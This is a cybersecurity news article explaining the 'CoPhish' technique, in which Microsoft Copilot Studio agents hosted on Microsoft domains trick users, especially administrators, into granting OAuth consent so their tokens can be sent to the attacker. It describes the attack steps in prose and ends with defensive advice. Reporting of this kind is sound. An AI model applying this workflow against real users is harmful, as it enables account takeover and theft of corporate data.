Stay updated with the latest Cybersecurity News on our TecnetBlog.

New Cophish Attack Steals OAuth Tokens Using Copilot Studio

Written by Alexander Chapellin | Oct 27, 2025 8:19:19 PM

A new phishing technique known as “CoPhish” is gaining attention in the cybersecurity world. This method takes advantage of Microsoft Copilot Studio agents to send fake OAuth consent requests, all through legitimate Microsoft domains, making the deception much harder to detect.

The problem lies in the flexibility offered by Copilot Studio, a tool designed to automate business processes. That same flexibility has opened the door to new forms of phishing that were previously off the radar for many organizations.

Microsoft, for its part, has acknowledged the situation and confirmed that it is already working on solutions. A company spokesperson stated that they are investigating the case and plan to introduce improvements in future updates to strengthen security.

Although the CoPhish attack relies mainly on social engineering, Microsoft also noted that it is evaluating new measures to improve consent control and prevent users from unknowingly authorizing malicious applications.

 

How Is Copilot Studio Used in This Type of Phishing?

 

Copilot Studio agents are essentially chatbots that can be easily created and customized from Microsoft’s platform. These bots reside on the official domain copilotstudio.microsoft.com, giving them an air of legitimacy that attackers are exploiting.

The creation of these agents is based on what Microsoft calls “topics,” which are workflows designed to automate specific tasks within a conversation, such as answering questions or guiding users through a process.

What’s concerning is that these agents can be shared publicly by enabling the “demo website” option. This generates a URL within Microsoft’s official domain, greatly increasing the chances that a user will trust the link and end up signing in without suspecting anything.

In addition, attackers can configure these bots to simulate an authentication process. For example, at the start of a conversation, the bot may ask the user to enter a code, identify themselves, or even redirect them to another site or service. All of this happens without raising alarms, as it appears to be a legitimate interaction.

 

Customizable Login Theme at the Malicious Agent Source (Source: Datadog)

 

How Serious Can This Attack Be, and Who Can It Affect?

 

One of the most concerning aspects of the CoPhish attack is its flexibility. The attacker can fully customize the login button in the Copilot Studio bot, linking it to a malicious application. This application can exist either inside or outside the victim’s corporate environment, significantly expanding the attack’s reach.

This means that even an application administrator could be a target, even if they don’t have direct access to the environment where the bot is deployed. In other words, the attacker doesn’t need to be “inside” to cause damage.

In the current situation, if an attacker is already within the victim’s environment (i.e., inside the Microsoft 365 tenant), they can target any non-privileged user and use this method to escalate their access. However, Microsoft has announced changes to its default settings that will limit these attacks.

Once these new policies take effect, attackers will only be able to request limited permissions, such as read and write access to OneNote. This will close the door to more sensitive access like emails, Teams chats, or calendars. Even so, users with admin privileges will still be at risk.

 

Why Are Admins Still an Attractive Target?

 

The issue is that administrators can approve permissions for applications, even if they are not verified by Microsoft or not published by the organization. This gives attackers room to create multi-tenant applications (i.e., apps that work across multiple environments) and steer the login process toward a provider they control.

Once the user authorizes the application, the attacker can capture the session token. This can be done by configuring the bot to send a custom HTTP request (for example, to a tool like Burp Collaborator), including the access token in an HTTP header such as “token.”

With that token, the attacker can act on behalf of the user, access their data, or even move laterally within the corporate environment, depending on the permissions granted.

 

Add Required Actions to the Login Theme (Source: Datadog)

 

To make everything appear legitimate, attackers carefully configure the login settings of the agent in Copilot Studio. This includes using an application ID, a client secret, and the URLs of the authentication provider. These elements allow the login process to appear completely authentic, even though it is redirecting the user to a malicious application.

What’s most concerning is that the “Sign in” button shown in the chatbot can redirect the user to any URL the attacker chooses. While the OAuth consent flow URL is often used, it’s just one of many possibilities. In other words, the attacker has full control over where that button leads.

 

Read more: ChatGPT Atlas: The New Vulnerability

 

How Is the Attack Launched Against Administrators?

 

Once the attacker has set up the malicious agent and activates the “demo website” option, they can share that link directly with their targets. This can be done through phishing emails or even via messages on platforms like Microsoft Teams.

Here’s the catch: because the URL belongs to a legitimate Microsoft domain (copilotstudio.microsoft.com), and the page design looks just like any other Microsoft Copilot service, many users let their guard down.

This makes the attack highly effective—even against privileged users like administrators. These users might unknowingly grant sensitive permissions to a fake application, thinking they’re signing into a legitimate Microsoft service.

One of the few indicators that might raise suspicion is the appearance of the “Microsoft Power Platform” icon in the chatbot interface—something you might not expect when interacting with what seems to be a Copilot service. However, this is an easy detail to overlook, especially if the overall design looks trustworthy.

 

Microsoft-Hosted Page and the Login Button (Source: Datadog)

 

What Happens When an Administrator Falls for the Trap?

 

If an administrator clicks the login button on the malicious agent and approves the requested permissions, they are redirected to a legitimate authentication URL like token.botframework.com.

While this URL might look suspicious to some, it’s actually part of the standard bot validation process in Copilot Studio, further reinforcing the illusion of legitimacy.

Once the authentication process is completed, the user can begin interacting with the agent as if everything were perfectly normal. However, behind the scenes, their session token has already been sent to the attacker—without the user receiving any notification or alert about what just happened.

 

Why Is This Attack So Hard to Detect?

 

One reason CoPhish is so effective is that the token request is made from within the Copilot Studio environment, using Microsoft infrastructure and IP addresses. This means that, from the perspective of monitoring tools or user activity logs, there are no clear signs of a connection to a malicious external server. On the surface, everything looks like a legitimate interaction within Microsoft services.

 

 

How to Protect Against This Type of Attack

 

There are several key recommendations to reduce the risk of attacks like CoPhish:

 

  1. Limit Administrative Privileges: The fewer users with elevated privileges, the lower the impact if an account is compromised.

  2. Restrict Application Permissions: Enforcing policies that prevent users from authorizing unverified or external apps is crucial to blocking these types of access.

  3. Establish a Clear Application Consent Policy: Ensure that only pre-approved or reviewed applications can request permissions. This helps close common gaps in default configurations.

  4. Disable Automatic App Registration by Users: This prevents any user from registering new apps within the environment without oversight.

  5. Monitor Consent and Agent Creation: Closely monitoring events related to application consent in Microsoft Entra ID (formerly Azure AD) and the creation of new agents in Copilot Studio can help detect unusual activity early.

 

What Should We Learn from CoPhish?

 

This type of attack highlights how adversaries are leveraging legitimate tools to create sophisticated attack vectors. It’s no longer just about emails with strange links or misspelled domains. Phishing now masquerades as ordinary business processes, using trusted infrastructure to fly under the radar.

The CoPhish case is a clear example of why security cannot rely solely on domain appearance or page design. Even when everything seems to be within the Microsoft ecosystem, it’s essential to carefully review permission requests, application origins, and the purpose behind each authentication flow.

Beyond technical measures, cybersecurity education is critical. Training users to identify risks, understand how attacks like CoPhish work, and respond wisely to unusual requests can prevent unauthorized access before it happens. Technology offers protection, but well-informed people are the first line of defense.